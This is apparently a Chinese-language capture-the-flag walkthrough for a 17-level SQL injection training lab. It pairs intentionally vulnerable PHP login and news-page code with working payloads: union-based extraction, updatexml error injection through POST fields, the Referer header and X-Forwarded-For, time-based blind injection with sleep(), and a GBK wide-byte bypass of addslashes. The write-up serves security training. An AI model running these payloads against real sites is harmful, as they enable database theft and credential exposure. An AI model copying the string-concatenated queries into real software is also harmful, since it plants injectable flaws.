1
pass-01
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='.$id;
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(column_name) from f.columns where table_schema=database() and table_name=0x6572726f725f666c6167;
//0x6572726f725f666c6167是error_flag的十六进制
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,flag from error_flag;
2
pass-02
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='\''.$id.'\'';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union all select 1,2,flag from error_flag %23;
3
pass-03
sername = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='(\''.$id.'\')';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-03/index.php?id=1') union all select 1,2,flag from error_flag %23;
4
pass-04
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=("'.$id.'")';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union all select 1,2,flag from error_flag %23;
5
pass-05
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
mysqli_select_db($conn,'******'); //不想告诉你们库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}
else{echo '账号密码错误';}
用Hackbard的post注入,找到回显点:
username=admin&password=as4dsa2dsad2a3' union all select 1,2,3 limit 1,1#
表:
username=admin&password=as4dsa2dsad2a3' union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1#
字段:
username=admin&password=as4dsa2dsad2a3' union all select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1#
拿flag:
username=admin&password=as4dsa2dsad2a3' union all select 1,2,flag from flag limit 1,1#
6
pass-06
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =("'.$username.'") and password=("'.$password.'")';
mysqli_select_db($conn,'******'); //不想告诉你们库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}
else{echo '账号密码错误';}
username=admin&password=as4dsa2dsad2a3") union all select 1,2,flag from flag limit 1,1#
7
pass-07
拼接一个完整的insert 并且在其中写一个updatexml报错注入。
'or updatexml(1,concat(0x7e,user()),1),1)#
取表:
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#
取字段和flag:
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag_head')),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
8
pass-08
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_REFERER'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO refer (`refer`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';
Referer: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
9
pass-09
function getip()
{
if (getenv('HTTP_CLIENT_IP'))
{
$ip = getenv('HTTP_CLIENT_IP');
}
elseif (getenv('HTTP_X_FORWARDED_FOR'))
{
$ip = getenv('HTTP_X_FORWARDED_FOR');
}
elseif (getenv('HTTP_X_FORWARDED'))
{
$ip = getenv('HTTP_X_FORWARDED');
}
elseif (getenv('HTTP_FORWARDED_FOR'))
{
$ip = getenv('HTTP_FORWARDED_FOR');
}
elseif (getenv('HTTP_FORWARDED'))
{
$ip = getenv('HTTP_FORWARDED');
}
else
{
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
$username = $_POST['username'];
$password = $_POST['password'];
$ip = getip();
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');//不想告诉你库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO ip (`ip`,`username`) VALUES ('$ip','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';
X-FORWARDED-FOR: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
10
pass-10
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id='.$id;
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$news = $row['news'];
}
if($news!== ''){
echo '有数据';}
我拿起手中的burp来跑起,12字符快。
按从1到12的顺序把ascii码写下来准备解码。
107 97 110 119 111 108 111 110 103 120 105 97
11
pass-11
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id="'.$id.'"';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$news = $row['news'];
}
if($news!== ''){
echo '有数据';}
12
pass-12
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
mysqli_select_db($conn,'******'); //不想告诉你们库名
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
echo '成功登录';}
else{echo '账号密码错误';}
13
pass-13
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id="'.$id.'"';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$news = $row['news'];
}
echo '有数据';
(1) if(条件,满足条件的返回,不满足田间的返回)
(2) sleep(X):休眠X秒
1" and if(ascii(substr(database(),1,1))>1,sleep(1),1)%23
14
pass-14
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id=(\''.$id.'\')';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$news = $row['news'];
}
echo '有数据';
http://inject2.lab.aqlab.cn:81/Pass-14/index.php?id=1') and if(ascii(substr(database(),1,1))>1,sleep(5),1)%23
15
pass-15
$username = '';
$password = '';
@$id = addslashes($_GET['id']);
@$sql = 'select *from user where id=\''.$id.'\'';
mysqli_select_db($conn,'****');// 不想让你们知道库名
mysqli_query($conn,"SET NAMES gbk");
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
接着判断字段长度、等拿flag和第一题一样:
http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1%df' union all select 1,2,3%23
16
pass-16
$username = '';
$password = '';
@$id = addslashes($_GET['id']);
@$sql = 'select *from user where id=("'.$id.'")';
mysqli_select_db($conn,'****');// 不想让你们知道库名
mysqli_query($conn,"SET NAMES gbk");
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-16/index.php?id=1%df") union all select 1,2,3%23
17
pass-17
$username = addslashes($_POST['username']);
$password = addslashes($_POST['password']);
$sql = 'select *from user where username =(\''.$username.'\') and password=(\''.$password.'\')';
mysqli_select_db($conn,'******'); //不想告诉你们库名
mysqli_query($conn,"SET NAMES gbk");
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
if($row){
echo '成功登录';}
else{echo '账号密码错误';}
因为是盲注所以嘿嘿,抓包,存123.txt,注意:一定要抓我们自己成功构造登陆的形式加*来让sqlmap跑,不然可能跑不出来。
看雪ID:孤桜懶契
https://bbs.pediy.com/user-home-922735.htm
# 往期推荐
1. Cisco RV160W系列路由器漏洞:从1day分析到0day挖掘
2. 从SSL库的内存漫游开发dump自定义客户端证书的通杀脚本
3. Avast、AVG、Avira三A合一,诺顿正式发起要约收购Avast
球分享
球点赞
球在看
点击“阅读原文”,了解更多!